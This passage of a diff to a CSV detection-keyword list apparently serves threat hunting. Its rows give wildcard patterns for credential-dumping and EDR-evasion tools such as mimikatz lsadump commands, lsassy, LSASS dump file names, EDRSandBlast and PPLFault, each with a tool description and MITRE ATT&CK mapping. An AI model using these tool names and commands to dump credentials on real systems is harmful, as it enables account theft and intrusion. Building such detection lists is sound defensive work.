keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::netsync*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::packages*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::postzerologon*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::RpData*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::sam*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::secrets*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::setntlm*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::trust*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*lsadump::zerologon*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" "*lsarpc_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 
- T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*LSASecretDefaultPassword*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" -"*lsasecrets.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*lsasecrets.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" "*lsass comsvcs*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" "*lsass 
direct*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" -"*Lsass Dump File Created*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","9","1","39","3","2023-09-11T14:03:21Z","2022-09-13T12:42:13Z" +"*Lsass Dump File Created*","offensive_tool_keyword","EvilLsassTwin","attempt to duplicate open handles to LSASS. 
If this fails it will obtain a handle to LSASS through the NtGetNextProcess function instead of OpenProcess/NtOpenProcess.","T1003.001 - T1055 - T1093","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access - Defense Evasion","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","9","1","39","3","2023-10-04T21:33:57Z","2022-09-13T12:42:13Z" "*lsass dump from agent*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" -"*LSASS dump might fail if RunAsPPL is enabled*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*LSASS dump might fail if RunAsPPL is enabled*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*lsass.dmp*","offensive_tool_keyword","AD exploitation cheat sheet","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","TA0006","N/A","N/A","Credential 
Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*lsass.dmp*","offensive_tool_keyword","lsass","Dump LSASS memory through a process snapshot (-r) avoiding interacting with it directly","T1110","N/A","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*lsass.dmp*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*lsass.dmp*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*lsass.exe*.dmp*","offensive_tool_keyword","ppldump","Dump the memory of a PPL with a userland exploit","T1003 - T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/itm4n/PPLdump","1","0","N/A","N/A","8","774","137","2022-07-24T14:03:14Z","2021-04-07T13:12:47Z" "*lsass.exe*C:\temp\tmp.tmp*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" "*lsass_*.dmp*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" -"*lsass_dump_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*lsass_dump_lsassy_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*lsass_dump_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*lsass_dump_lsassy_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active 
Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*lsassdump.dmp*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" -"*LsassDump_20*.ps1*","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","983","166","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" -"*lsassdumps*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*LsassDump_20*.ps1*","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","10","984","166","2022-06-18T16:52:38Z","2021-10-08T17:36:24Z" +"*lsassdumps*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - 
TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*LSASSProtectionBypass*/","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" -"*LsassSilentProcessExit.cpp*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","421","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" -"*LsassSilentProcessExit.exe*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","421","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" -"*LsassSilentProcessExit.vcxproj*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","421","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" -"*LsassSilentProcessExit-master*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential 
Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","421","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" -"*lsassy *","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"*LsassSilentProcessExit.cpp*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*LsassSilentProcessExit.exe*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*LsassSilentProcessExit.vcxproj*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","0","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*LsassSilentProcessExit-master*","offensive_tool_keyword","LsassSilentProcessExit","Command line interface to dump LSASS memory to disk via SilentProcessExit","T1003.001 - T1059.003","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/deepinstinct/LsassSilentProcessExit","1","1","N/A","10","5","422","64","2020-12-23T11:51:21Z","2020-11-29T08:49:42Z" +"*lsassy *","offensive_tool_keyword","lsassy","Extract credentials from 
lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","0","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "*lsassy -*","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","10","3","279","23","2023-09-30T11:10:26Z","2022-05-24T11:05:21Z" "*lsassy -v -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*lsassy.*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*lsassy/dumpmethod*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*lsassy_dump*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*lsassy_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration 
and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*lsassy_dump.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*lsassy-linux-x64-*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*lsassy-MacOS-x64-*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*lsassy-windows-x64-*.exe","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*lse.sh -l*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2924","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*lsassy.*","offensive_tool_keyword","lsassy","Extract credentials from lsass 
remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*lsassy/dumpmethod*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*lsassy_dump*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*lsassy_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*lsassy_dump.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*lsassy-linux-x64-*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" 